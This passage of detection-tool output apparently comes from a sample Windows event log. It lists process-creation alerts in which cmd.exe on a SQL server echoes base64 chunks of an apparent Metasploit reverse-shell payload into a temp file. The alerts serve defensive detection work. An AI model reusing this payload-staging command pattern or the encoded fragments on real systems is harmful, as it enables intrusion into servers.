AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:09.995 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x106c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:10.269 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IHsEQQA5bjUAuwAH1ajfhfFABqpn0EAo0RAQQCjBBgDADMKxUhPjgBXjUUM5iGOc6pRx+HwF0EARNJABJUdQDxBUG7WTAAAaOBfQADo2KQAAIPEBFNTU2hMQKcA6Ds+ANSLVQyGIgiLYEx+QQBSUI1V9FFS6GRKAACLVfSNRfyNTftQUWgU0kABUujeSgA3hcAPhZoEPEqLNWj6QKoPvkX7g8Bag/g5D4dmBAAAM7iKiAgXQAD/JLaYFkAAi1X8UsAVbMFAs4PEBDvDoxBUnnAPsT0E0C1o+M9AE+htLAAA6SuTAADHBdQCQQABAAAA6R8Efk+JHRRZQADpFAQrAItF/FD/FVOh2ACjGPpAq+kWMgAAi02l2v8LbMGPAKOoAkEA6enPAAA5HWACLAB+DWgc0UAAzhQLAABuxATHJmACZAD/////6USc>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc48 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:10.544 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AACLVfxS/xWIwUA6o7gL2wDpsQMAACYdHNDmAOmpLAAAi0X8UP8ViMFAAFgvFygA6ZIWAACJHSDQQADpGAMAANYdYGnAm3QNaLzRQABM4AUAAIPEBIv2/AirhjUABYMxGzt8dVbHBTsCQQABAAAA6SukHgA5HSA4QQAPhEoDAABQ/xVwV0DsOR1gAkEAdFBuoDNAEug2BQAYg8QEi1X8Ujc/NQAAg8QEO8N1D8fnYOBBAAIAAADpDwMqADkdAjhBAA+EAwMAAFAMFXDBfQDH+FxlQQBUAAAA6e17/gCLSfxQNxVsFkAAllgCpADp1gIAiotu/FH/FWyMQACjZBoyAD5pENBAAN7DAABPuAIAAItF/LqVrkGDudCKCIgMVkA6H3X26aIXAC2LVVuhkiNhMVNonNFAAKpokNFMAFDoXkYAAIPEFCFEQEFz6XsCAK6LjPyLDXTB4q+DOQF+ETPSqAiKF1L/Oo0Yg4PECOsSiw1DwUDTM8CKB4sRigRCg/jAO8N0BkeYffzryIPJ/zNR8v730Uka6MqgAAA9AAQAhHYNaGjRQL/oWQQAm4PEBItV/Bfq/4v6M8DyrvfRI42F9Pv//1FSUHB4oAAAU/+N9Ir//2ic0UAAkGhQ0UAa6Y4A+7WLfe+LDXTBQACRzgF+ETPSTMeKF3D/+o99/IPESOsSoA149kAA/NmKHYsRihVCgwEIrcN0BkeaffzryIP3TTPA8q73tElR6OugAJI9AFAJAHYNaDTRQADoEwMMHYOdpItS/IOe/4v6yMDyrvf8SaKF9ML///VSUOc2oE0AU42N9Pv/UGiW0UAAUWiF0YkAixUEGEEAiJwF9Pv/G6FMQEEAUlDou0QAAIPEGKMEGEFe6V0BAACLTfyLFUhAwgChTEBBAFNonDtAAFFSUBWSRAAAi022iz2MwXoApAVoENFAAFGjSEBBAP8Ag/wghcB1D8fCfDpBlIsAAADp6gAAS4tV/GoHCwjRQABS/ziDxAyFwM0PSQWEAkEAagAAyenHAAAxHkX8agto/NCOAFD/1wHEDIV7DxfWAAAAxwWAAgwAAQAAxOmghwAAx4GIQ7GFUAAAAOmRAAAAi038x6iIYkEAIioAzokN6JEqG9NHi1XKgTrqXrh8wUAAg8QIwcPgErQY/1D/FbjBJwCDxASjdAJBAIvMK7pAPJ4AK9CKygoMAnA6y3X2Ga54AkEAAQAAAOvQvkX8xwWIDkEAAQAAAFOoFEEA6yOLTfzHBYgCQQCpAAAAhIO1F0FlsQ6LVQyLAlCO/S0AAIPEFotF9I0V/I1V+1FSaBTSQABQ6ERGAACFwA+ER/v//4tF9ItNCN81gHJAAEk5SHW+1ouGDIsWyMBAACbZQIsCUNvc0EAAokvWi1XTiwJQ6GstAACLRfSDxECLSKZ8UByLFIpBiUgyoUxAYACzUOjJK7Qrs+iaLwAAg8QEhcB0U4tqPaHIwEAAZMBA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1184 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:10.819 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ixFSaMjQMgBQ/9aLTQyL6VK/W5MAAH3EEKHL0EAAO9l8Bz0gXAAAsS+LRQyLFcjAQABoIE5vAIPCQD8rUWig0EAAUqTWi0UMizis6CEtAAChGNBAAIPEFIsN9dBAADvBfivCVfaLDcjAfwCDwUA2sVBo5NBjAFH/1otVDIsCUOjtLAAAi28Q0EAAg8QROR0U0MAAdD6B+Zb5AAB+DxlnZmZm5NXB+o+ZysHpHwPRg72diRUU0EAAfSDHBRTQQABkAAAA/xTUN0UAAF9eM8Bbi+Vdw4kdFNBAAOgjLNAA/Q4RAACLFUxAQQBS6HI3AABfXgXAW4vlXcOQmxJAAHQSQADiE0AALhNAAIERQBtbEkAAOxZgAJr8QAAWEUAAAsVAAGJvQiZtEUAAThFAewgVQAAqP0AA6BBAAL8QQACMf0AAcudAABoSQAA9EjgAOxFAslkSfAB2FIwAhRRAAN8UQCXzFEAAFhVAAAAbARu3GxsuGxsbG6AbmQMbsQSFGwYbBxsbrRsbGxsbG4kJClYbDA0OGw8bqibqERKcGxQVFhcYGRqQkJCQkJCQkMSQkHKQWFXh7ItFCI1QyMBAAFCDwfxoadJAAFH/FYDBPgChrAJBAB7EBYXAdA9QaJrSQAD/FWTBQACDxAhqAf8VcMFAAJBVi+yB7LgAAEiheLlBToXAoUxAQQB0FGgxPJcAUP2eQAAAZosNdKxB50kUi7ReGEEAUlDoiEAAAGaLDfR3QQDpCBhBAKGIAkEAYO+LNWTBQOFmiQ1VC0EAhcCwdV2LFUoYCQBSIGi1QAD/1qV4AmgAg8QIhcB0FaF0AkEAUFdAmEEAaNhjQAD/hYNaDDvC0EAAhcBigNRAAHUF23wYQABQylLU/wD/1ovSyLpAAIPBIFH/FVTBQACDxAyLFRjQQADoNYfBQABojJEAAHgDTLuwC0EAjBAmQABqIFD/1ou8TEBBAFIVGNB6uYPEEIwuIEEAagBRmmj4F0HA6IFHAC6FwHT2UKdQKEAA6OIFAACDOAihfAJBAIXAyTWhrAtBABsNnAtB/YsVSBRBAGoAgZzRQABQoUxAQetRaEjUQABSUOi7iQAAgy0csEhAQQDrBUNIQEEAi6WAAkEAhcl1JosQTEBBANMAaJzRQEtoRNRAAGgr4EAAUFHohD8AXYPCGKNIQEEAiw2EAnoAhcl1HIsVTEBBAEgAxxjUGQB6UktePwARgy4Qo0gtQQCLx2AGQQC9yX8viydoAkEAvvzTQACF0nUFvtQCQQCLFXgCoQCF0osVQEBBAHUGixXkF0FnhWW5+NNAAHQFbG/TQABQRQQYuGRQoXRAQQBQmFJRiw0w0EAAaNTTBQBoAAgAAFFN3paSAIOnb+t9ihWJOEEAv0CBYAB20nBuv8jTQACLmmgCQQC+/NM1DYXSdQW+1AJBAIsVeAI9AIXSixVAQPIAdQaLFeQbqwCD+QG5wNNAAHQFubym>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x224 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:11.094 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QABQoXBPQQBXUOljGEEA2aFEcEEAUFZSUYuoMNAyAGh400AAaAII+wAa6J5vAACDxCw9AAgAAHINaAXTQADoAv3/44PEBKFYAkEAuwIAOgA7w1kpoWDgQQA7w7jQ00B5KvG4udMKAIsVJ/RAllJQBgLTQKv/FWjBQABGxAyLZTDQQACDyf8zwPKuoWACQQBZX0mD+AGJDewXUgB8cKFwAkEAjUxqAVH/FVzBQAClxASDwHUfpxXxwEAAaBTTMwCDwo9S/xWAwUAx1cQIKOK2i+Vdw4sVMNBAAIvwFEBCiA5GhMl1A6cV7BdBAA8NcAL2mos1IDhBAI08AovywekCb6WLyoPhsfOkozDQpgBXTEC8AGaLDbQLyQCLFQgYQQBQTQBRagBSk/wXvQDoDlQAAIvwZoW/dCyhCBhBAI2NSP///1Bo9NJAAFBeUeg+azAAD79xfatI/7z/UlDo7uAA4IPEGOimTgAAi/ChZAJBAIv6pTigC0EAhcCJPaQLQQCJNcDLQQCJhsR8QQB055lqemhA7ZEAUlDoXJkAAON5E9eJt+xAVfDrDsfz7P/////HRfD/5/9/aBcgWwBT/xUTwf4AoRjQQAAYZQgz9oXATTEz/6cNsAuzAIm0D1hT+QDLFbCtQRqNBBdQ6IAcAKOhGND/AIPEBFWBx2AIAABy8Hxmiw0YZkAAs1XoiU38iw0s0KYAjUX8UosVKNBAAFGh+AWzAFFSUOiDRwAAhWeKDlBo6NIkAAIUAgAAg8QIi0X8hcB1VWjU0kAAOhD7h/+DxATINvzHM/ScAAAAhcAPjrVTAG3HRcgAEwAAL034BkXoi3QBRIsmCIXJD4QoRgAAixKtKuFcAgr2wyN0cw/o3FYAAIPTBKtpUA/q5vEAAPbDBA9GsQAAAIN+EgEPhZ4AAACh/BdBAItO0VBR6I5LAACLDfgXQQCLVosy+I1FwFBRx0XEAQARCYlVzOgvRQAAG4X/dPYMVgRS6DFLAACLtcQCQTOhSQJBAEOLyEAB+QqJubEC+gCjuJGHAH4mixXIwEAJaLDSQACDXUDq4xWAwUBQD792UGiY0kAA6B/dAACDxBDHRggAAAAA62N/RggCACPcixWoAkEAQonYFAJBXkzoWQEAAIPEBIN+CAN1SYtOBCkBAAAAiU2MiYlF3KH4F0EAjS7QUlA0TfqJdeToTNWTAOs2ND24AkEAixXM+0EAMUKJPbhHQQCJlykCQQBW6Mo6APWDxASLRfKLVfiVTfxAg8LVO8GJRdaJVfgPtiIn//+LDbyKQQCLj03jNaGbAkEAfxt8DSkVRD5BABpN7Du1cww7BQ3QQACNjBK8//+LDRS1QACFyXQaUKHIpEAAg8BAFIDSQABQ/xWAwUCAg8QM64poeNJAAP8VWMFAhYPEBNaIAkEAhcDlDOjffWEAX15bi2ldw0gA6DECANluxARfXluL5V2nF5CQkJCQclWL7Lfs>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xec4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:11.368 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo eOOLdQxWjUWIaniEVuiJaAAAi00IwBXIwEAArFGDwkBorN5AAIz2FYCuQAChrAJBAIPEFGPAdMxQaNfS3fU6FaC9zgCDxAhW/xVwwWEAXpCQRJDMkA6Q2ZC8OVWL7IPsFNRWuXUIV4tGFIlFwehJGgAAS6ALMgCJFaQLQQDM2ItGD4XAzvp1QIsNBGoAagBR6JaLAADNnjgIAACJvjwIAABcRhgAAAC8ixVUF7MAiVZzUbeQQQCFwHQ7oXACQQDNygPIiU776wKfjjgIpDOhKNAXAIsV8tA8AI/Ii4Y8CAAAE8I7+A+P5QAAAHwIO/4Ph6YAAACL3hiLHTDQQACLRgSNY3UDKFEWUOitawAAhRIqM4PBC8TRPWj9CgB0Jz3ZSQoAdLmYV/0KAKUZPST9CgB0Ej2hw5MAtwsOsyMLABWlpgAANIuoCIsdoAJBAIv6pAJBAAPcg9cviR2gAkEAiT2kIEEAi1YYi042A9boyIlWGImCtg+F7Jr1/8dGCN0AAC/oNEoAZaOgC0EAiRWkC10AkFYEibFACAAAMw2kC0FyuAEAAAAsRfBm1EX0iY5ECAAAi+trF/YcjUXsiU74UOqJzvzGH0BHAF9eW/zlXcN04NReAP8VZMFAX1boahoAAIPECMZeW4vlXcOLHbwCQQBovNRAAEOJJLwCQQAxq2TBGOhW6EIaAACDxAhfXluL5V3DkJCQkJCQkJBVi+yz7LzGAACLRZmVwHSG9YsJqwAQoAtBMokVpAtBPusLixWkC0EAoaA4QQDTix1tC0EA/leLPfcLQd8r0u7XifvYiVXQizVkwUAA34/YaLSY2gC0+kHCQADdXdC01mgvOUEZaKjfQAD/1qEAGEEAUGhGoUAA/8QzyWaLDUzdQQAvaMvfQAD/1miA1EAAw9YcFcNeQQAGJJ7fQMxv1rut0kEAUGgc30AA/9bTP9RAAP/Wiw3r3EAAlFkA388A/9aLVeKLRdBSFGjY3roA/9aLDawCQQCDxJ1RaLzFQAD/1osVuALnAFJooN4RAP/WqbjOQQCDxBCFwHQkocwCQemLDR4C7wAqFX8C4QBQocQCQQBRUlBokt5AAETWg/ROi5K8AkEAUWhI3kAAlNah0AJBAIPECIXAdHYoaCzeLgD/1oDECKEzYUEAhcB0EXQVsAKZAFJoEN5AANBKG1MIoZQCQQCLDcICQf5QUWjo3UAA/2ShYAJBiYPXDBb4AXUXixWkAkEM9KACQQBSUMLIpEAA/96DxAyDPWACQS4CdRiLaKQCQQCLFaACQQBRBmio3UAA/9aDxAyhnOKWuosNmDxBAFBRE4QUQAD/1n1F0NwdMMJAiebEDN/g9sRED4tqAAAAoewC2wCFwA+Ed6YAAN0FKMJAANx10IPsCN1dgNsFrAJBANxNgN0chGhQ3UAA/9bbBRjQQACDQQTcaNDcDSDnQADarqwCQQBCHPJoJN1AAP+c3UWV3A0g>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x274 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:11.643 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo wrR1g8QERzWsAugA3RyLaCjfQAD/1t+/kAJBAIPEBNxNgD0NGMJA+N0cFGik3EAA/9YsYAJBAIOlDIXAflnfO6ACd3KDyQjcTYDcDRjCUgDdHCQQfNJAAP/Wi+TfAkFaBrmQWLRjoaQCQQCLPZR/QQDw0xPHiQzYiUXcgwAE323Y3E2A3A14wkCo3RxHaIAIQAD/D4PEDKGsAkEAT8APjocNAAAzyerP/yb///9/O8FTTcCJTcSJTciJTQmJKuCJ1OSJTeiJTSaJfbCJVUSJfVeJdclTvWD////zlY////+JfQaJVdSJjXD///+JjXQ2//+ETbiJDPKJjTb//9mJjWyR//+JTYCJsISJjXiE//+JjXz///+JNQCJTayJTYgLTYyJTZCJTZSSjosBAAD6WcgLQRll0vSDwRCJZfxVeQSLRbSLGVLHfA2RBTktJHIGtl2wiX20i0EMi1EIOUWkfA2LBRoPoFAGiSKg3EWkK9Mbx4u9ZFD//zv4YhaiCDmVe///KHIMiZVg//9EiYVk//81i3kJi1nPOX3UfBJ/CvOJ0Ds1i3/hcgaJXfeJ7dSLnXRIsP/UWV5/J3wPo038i51w//8jrHE72XcWh838i6aJnXD///+LWdmJnXT////rA89N/ItJCYtdvDvZfyB8DfuyX4tduOBJYDvZdxGLTfyLWQiJXbhhQgyJXbzrAyRO/DmFbP//738WfAg5lcf///9DDImVaP///4mFbP///zl9hH8YfOWLSfiLXYA72cUe/HcJJFnciX1fifyAi+SLXcAD2YtN/IldwItdxA1JBPrZLk38uyPUi13Ii0kIA9mLTfyJXch9XcyLSQxY2YtNEr7K71XoiV3MISSHiU3guPX8ntiLU/iJ3lOLXewD0Iuz9IlVsRPfg8EgSIld7IlN/IlFsw+Fe/5e/6GsAkGUmYva3FXEi/iLRcAcV1JQpSaQAACLTcyJVZ2LVchTV1FSiUX4jBGQAACpTbyJRZiLTeRTV1BRplW56PyZtTqJVcyLVewpRciLRbpTV1JQ6OeNADUTD8ChrAJBAIXAiVWQD46IAAAA322Yiw3IpkHr3V3Y321ejQIQi0usAkEA3Vvx32033V3o323A3V3R3YV45WH/3UWo3UX03UWQ92gI3UXYg8AgSdjp2cDvySPG3evfaODdReDY6dnAu8neYt0x2YnY4SVl6NnJNNjZwMDJ3sPd2N9o2Npl8NnA2Mnewt3YdbLdgJDdhIjdXfXrBtyFeP///6HYAkEAr/gBV9uNUP+JVfT/RfTY+dn63Z14////6xRS9XjH/3wAAAAAx4V8rAb/AADbAIP4Ad3Yy5ONSP+JTbHbRfjcfajZ+t1dqOsOtUWIAAAAAMcucoUAALGDsAF+E41Q2YlV9Nss9Nz9iNkx3V1x61nHRYgAAADvx0WMjgAAAIP4AX4sjUj/iU0829/04X2Q2Yr1FKvrDsdFYgAAAADH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:11.917 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo RZQA/QAAixXIC0EAaCwwIwBqIFDH/zNEwUAAiz2sXEEAg0aNg/8BfkCLhCUBAACAeQV8g8j+QHQwi+iLHaAYQQCZmsIJANH4weBDA8NqAotIMItQEANTi1A0E1AU3VHoQY4AAIlF8Osbi8eLHWQLQQCZrcLR+MHgBYtMGBCJTf+LVBgUaBIxQAAfIDlTs5v0XBVEweEAlz2sAkE+g8oQg/8Bfk+LxyWOegCAeQWUg8j+QHQ/48eLHcjeQQCZKydqANH4E+AoA8NqAosePotQCSspi1A8G1A0K0gQG1AUA3hjxikcUlHoPI0AAIlF6IlVPus7i8eLPcgfQS+ZK8Iz+MHgBQPDi4cdi2pmA8qLS5WJTSOLSBx5yolN7HzAMUAAaiBXU4YVRMGv4YtArAJBAIP1EIP/AX5APcclAQAAgKgFtoPIS0B0MIvoix3IC3wAmSvCagDR+MFoBVjDagKLNyiLUAgDyItQLBNNDFJR6ICN2C6JReCiG6LHix3IC0EAmSsf3PjB4AWLTBgIiU3gi90YDGggMQgAaiBXU4kr5CQVRMFAdqGsAkEAQMQ3g/gBn0KLyI/hAQAAgDIFSYPJ/uF0MZkrp4scEQtBANH4weDdA8JqAGoCKEg4i1iE91A8i3gceKET11JR6LeMAACL04va6xeZVMJbyP66C0EA0fnB2gWLfgEYi1wBHNY43EAA/9aLG7CLTbSDxAQF9AEAAIPRjmoAaOjNAABRUOx0jMcAi02kiUWwi0WgagAF9AG8AGgMAwAAg9EAiVW0UVDoJy0AAItN/IlFQYtF+GoABfQBAACQ6AOQAIPRAO9VeFFQ6DAvAMSLTcyJRfiLRcNqAI/aAQAAaOgDAACD0QCJVfxRYZgOjF+Ni+PEiUW+i0XAao5M9AEAAGjoAwAAgywArFXMUVDo7IsAADN9nIlfwItFQ8YABfQBAABoZlZwAIPRAIlVxFFQ6MrBAACLwvSJRZiLBvDf+Wb0AQAAaOgDAACP0QCJVZxRULKoiwAAiTnwi0XoiVX0i03sBVwDqQCD0QBqAGjoAwAAUVDohvoAAItN5Ikt6ItF4GoABfTZAABoXANoAIPRGIlV7HJQ6L2LAACBx/QBAADEAINvAGjbAy8AU1euROCJ8U/oR4sAAJqNdP///4lF2IuFcFH/